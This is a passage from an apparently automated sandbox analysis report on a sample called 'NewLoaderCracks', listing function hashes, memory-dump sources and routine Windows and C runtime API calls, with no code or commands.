                • Opcode Fuzzy Hash: 28f0cb39348040b2be93a15e21e597b47aa29d319de74c418163c5d9ac9e48b8
                • Instruction Fuzzy Hash: 6512E5B17047468BC728CF28C8E46B9BBE0FF54309F50892ED997C7A81D774A899CB45
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 24fd448b100bee47127208fde133beb5ee682876965660d95c41571591afb645
                • Instruction ID: b71981972d85f1173ec7e7c9c421e0870d7a8f928a4d0f3a0bd6542270b23827
                • Opcode Fuzzy Hash: 24fd448b100bee47127208fde133beb5ee682876965660d95c41571591afb645
                • Instruction Fuzzy Hash: D2F1797160A3018FC758CF29C4889AEBFF5FFC9318F148A2EF59997252D630E9058B42
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction ID: 3f0dff6c7022823182d7dc071f0ec24891756778cfce70b473f84f8d3bc58278
                • Opcode Fuzzy Hash: bf6ffcbe3773841c348058a39a16573d3b2338b254e5945c46ce03dce2746f28
                • Instruction Fuzzy Hash: BFC181762151A30ADF2D4639857403FFFA1BAA27B131A275DD4B3CB1D4FE20DA64DA20
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction ID: b668021f434ae4d3de296c719d4c3f28dfaef53c99b5e3fcba28d1208afe2aa4
                • Opcode Fuzzy Hash: a635e2a33a60bcf8d734eac2a911e111534612f0cd64c6a362f1e57f4f360174
                • Instruction Fuzzy Hash: E9C1A0762095930ADF2D463AC53403FBFA1AAA27B131E176DD4B3CB1C5FE20D664DA20
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction ID: 5386d78962f1db6447604ac24158aa4a331ae955500679df2673a6382acaae57
                • Opcode Fuzzy Hash: 693fc2a06020ee0ee57da02a4a933cd5ad315ff3ac21a4b032580d2a5e4f36f6
                • Instruction Fuzzy Hash: 52C182762051930ADF6D8639857403FBFA1BEA27B131A276DD4B3CB1C5FE20D664DA20
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: H_prolog
                • String ID:
                • API String ID: 3519838083-0
                • Opcode ID: e50934a3d32a0906e4e04390df4e20cae3864167cc4dee125e86138ceee6d1ec
                • Instruction ID: 0260f0fe2dbfc8f6b02a0da09942cfe1ed1a55ec18dd8c7d15c7755d71e1742e
                • Opcode Fuzzy Hash: e50934a3d32a0906e4e04390df4e20cae3864167cc4dee125e86138ceee6d1ec
                • Instruction Fuzzy Hash: 73D1F3B1A043828FDB14CF28C8A475ABFE0BF95309F44456EEC449B242D734E95DCB9A
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction ID: addb623b6dfc2b2d5f96a9498924f4d0051c7a97c5af285f3846c78b9490cdb6
                • Opcode Fuzzy Hash: b18fb967447e529c76739499a87999de3f08bdf72590393fa5476362680146d7
                • Instruction Fuzzy Hash: 6DC1A6762051930ADF6D4639C53403FBFA1BAA17B231A276DD4B3CB1D5FE20D664DA20
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 10eca14f77452a8004f7181e7178e2cc485d3532622b3a429d5c6d9fddf3adb1
                • Instruction ID: 6032274fd03de11ea91d8fd380fb5c5c9ed792b5c8a9d53ab0d1ed0be10d5d3a
                • Opcode Fuzzy Hash: 10eca14f77452a8004f7181e7178e2cc485d3532622b3a429d5c6d9fddf3adb1
                • Instruction Fuzzy Hash: 7FE148745183848FC304CF29D4A096ABBF0BF9A300F85095EF9D5A7352D335EA19DBA2
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                • Instruction ID: 39c0422c6e63dfab722ee3cea431e3996460738dd0f5945e14597ffdf38142b0
                • Opcode Fuzzy Hash: 4b6a3d46f10441a3051e9d0d7f9b8667803012905bf4d198d95ae77b69715ff4
                • Instruction Fuzzy Hash: 62915B7020434A8BD724EF68C8A5BFA7F95FF90345F10092EE99B87282DA749B4DC741
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 50913caf4a0291020e1fc2dbd861be4486ddfcea3ef75a5a55b268de665b1c6d
                • Instruction ID: 8d22ba7df8ad28b05e3d1c39aa821e3557876516ff318b2c836deb7c23cfa129
                • Opcode Fuzzy Hash: 50913caf4a0291020e1fc2dbd861be4486ddfcea3ef75a5a55b268de665b1c6d
                • Instruction Fuzzy Hash: 95619A716C070977DE389AA89899BBF2F96FB41700F140A1AF482DB291D611DD42CF59
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                • Instruction ID: e37a8a418a856e85fcaba68facd54b30d6b0daeec52956c21be3e9e9916f104c
                • Opcode Fuzzy Hash: 2fa2980f550074fd9d5fffc8fceb723f20dffd391df208c388f2810114909e4d
                • Instruction Fuzzy Hash: B7711D716043464BDB24DE68C8E5BAD7FE4BFD0349F00092FED8A8B282DA74968D8751
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction ID: f0f0ffbaf8fdaea9c5200085c3ced205f5265e10b89a80666a5a7b1cc82d5b36
                • Opcode Fuzzy Hash: 1d25a7c413b64cc1c4dee81fed1a27e24b1c019bc61537549567cd7e8aefb3c1
                • Instruction Fuzzy Hash: D5517B71740A855BDB3899688859BBF6FC9FF93300F180919E982D7282D715ED43CF92
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 9c95718df21229ae9e2228b716aa354d552574fa3fe244cac6ef708eb5d956f7
                • Instruction ID: 6da3b120dfa335472a9f638fefc43ec0c83c3c160c69afb22940ecc48b905cbe
                • Opcode Fuzzy Hash: 9c95718df21229ae9e2228b716aa354d552574fa3fe244cac6ef708eb5d956f7
                • Instruction Fuzzy Hash: 928192B121E2D49EC7168F7D38A52F53FA16777340F2824AACCC5A62A3D136495CF721
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: b7f0bbc55ca66963c6ce5064a8c10898570b597a6f1defc31345e53f8e64fe87
                • Instruction ID: 12da63ee2323c8c7102817a43b91369100b0959abd617b2b8be32b64f01f0536
                • Opcode Fuzzy Hash: b7f0bbc55ca66963c6ce5064a8c10898570b597a6f1defc31345e53f8e64fe87
                • Instruction Fuzzy Hash: 9851C0319083D64FC712CF2691894AEBFE1BEDA318F49489EE8D55B242D230D649CB92
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: d1a91d25b19205f0e2f2d19660a2342f1c030619e2d565469e72bdd266e12f09
                • Instruction ID: e14ab95135b2658fa13f2a7a8cec34f93dd8e80ccd9580d5385b951065936d59
                • Opcode Fuzzy Hash: d1a91d25b19205f0e2f2d19660a2342f1c030619e2d565469e72bdd266e12f09
                • Instruction Fuzzy Hash: 12513471A083028FC748CF19D48059AF7E1FF88354F058A2EE889A3741DB34EA59CB96
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction ID: 10be9333105271a46e832ed4d1f36c74ba92c8e7c9241ca59e15fe32bc711eee
                • Opcode Fuzzy Hash: 680dd35d5b71cc1049d84931067584ed44f7cee91fcb56c6d02cf908e44fe073
                • Instruction Fuzzy Hash: 5131F8B1A147464FC714DF28C8612AABFE0FB95305F10492EE8D9C7742C735EA4ACB91
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID:
                • String ID:
                • API String ID:
                • Opcode ID: edfe2c4fbfbaa12d957617e0ec44ca7fcfe001eae94f70bedff0a648ab0908f2
                • Instruction ID: b16574a019140cbec9750e26a69dc2be855e3b85c402f6740e9ea47ccff85c96
                • Opcode Fuzzy Hash: edfe2c4fbfbaa12d957617e0ec44ca7fcfe001eae94f70bedff0a648ab0908f2
                • Instruction Fuzzy Hash: 1F214972A201214BCB48CF2DECE0C7A7751B79A310746812BEE4ADB2D1C534E82DE7A0
                APIs
                • _swprintf.LIBCMT ref: 0054DABE
                  • Part of subcall function 0054400A: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 0054401D
                  • Part of subcall function 00551596: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00580EE8,00000200,0054D202,00000000,?,00000050,00580EE8), ref: 005515B3
                • _strlen.LIBCMT ref: 0054DADF
                • SetDlgItemTextW.USER32(?,0057E154,?), ref: 0054DB3F
                • GetWindowRect.USER32(?,?), ref: 0054DB79
                • GetClientRect.USER32(?,?), ref: 0054DB85
                • GetWindowLongW.USER32(?,000000F0), ref: 0054DC25
                • GetWindowRect.USER32(?,?), ref: 0054DC52
                • SetWindowTextW.USER32(?,?), ref: 0054DC95
                • GetSystemMetrics.USER32(00000008), ref: 0054DC9D
                • GetWindow.USER32(?,00000005), ref: 0054DCA8
                • GetWindowRect.USER32(00000000,?), ref: 0054DCD5
                • GetWindow.USER32(00000000,00000002), ref: 0054DD47
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
                • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                • String ID: $%s:$CAPTION$TW$d
                • API String ID: 2407758923-2938658339
                • Opcode ID: c01715d362f267140d270aa9421d42d738bc793f60c0a6ba72cb5aa1e2ec8068
                • Instruction ID: 4fcda318a1945e42dce8ea80cd0abac83a836a1cdf4c3064267cc3776c9792a4
                • Opcode Fuzzy Hash: c01715d362f267140d270aa9421d42d738bc793f60c0a6ba72cb5aa1e2ec8068
                • Instruction Fuzzy Hash: C4818F71508301AFD710DF68CD89AABBBF9FBC9708F04491DFA8893251D670E909DB62
                APIs
                • ___free_lconv_mon.LIBCMT ref: 0056C277
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BE2F
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BE41
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BE53
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BE65
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BE77
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BE89
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BE9B
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BEAD
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BEBF
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BED1
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BEE3
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BEF5
                  • Part of subcall function 0056BE12: _free.LIBCMT ref: 0056BF07
                • _free.LIBCMT ref: 0056C26C
                  • Part of subcall function 005684DE: RtlFreeHeap.NTDLL(00000000,00000000,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958), ref: 005684F4
                  • Part of subcall function 005684DE: GetLastError.KERNEL32(00573958,?,0056BFA7,00573958,00000000,00573958,00000000,?,0056BFCE,00573958,00000007,00573958,?,0056C3CB,00573958,00573958), ref: 00568506
                • _free.LIBCMT ref: 0056C28E
                • _free.LIBCMT ref: 0056C2A3
                • _free.LIBCMT ref: 0056C2AE
                • _free.LIBCMT ref: 0056C2D0
                • _free.LIBCMT ref: 0056C2E3
                • _free.LIBCMT ref: 0056C2F1
                • _free.LIBCMT ref: 0056C2FC
                • _free.LIBCMT ref: 0056C334
                • _free.LIBCMT ref: 0056C33B
                • _free.LIBCMT ref: 0056C358
                • _free.LIBCMT ref: 0056C370
                Strings
                Memory Dump Source
                • Source File: 00000000.00000002.2152571235.0000000000541000.00000020.00000001.01000000.00000003.sdmp, Offset: 00540000, based on PE: true
                • Associated: 00000000.00000002.2152556901.0000000000540000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152600750.0000000000573000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.000000000057E000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.0000000000584000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152617109.00000000005A1000.00000004.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005A2000.00000002.00000001.01000000.00000003.sdmpDownload File
                • Associated: 00000000.00000002.2152672208.00000000005E7000.00000002.00000001.01000000.00000003.sdmpDownload File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_0_2_540000_NewLoaderCracks_1.jbxd
                Similarity
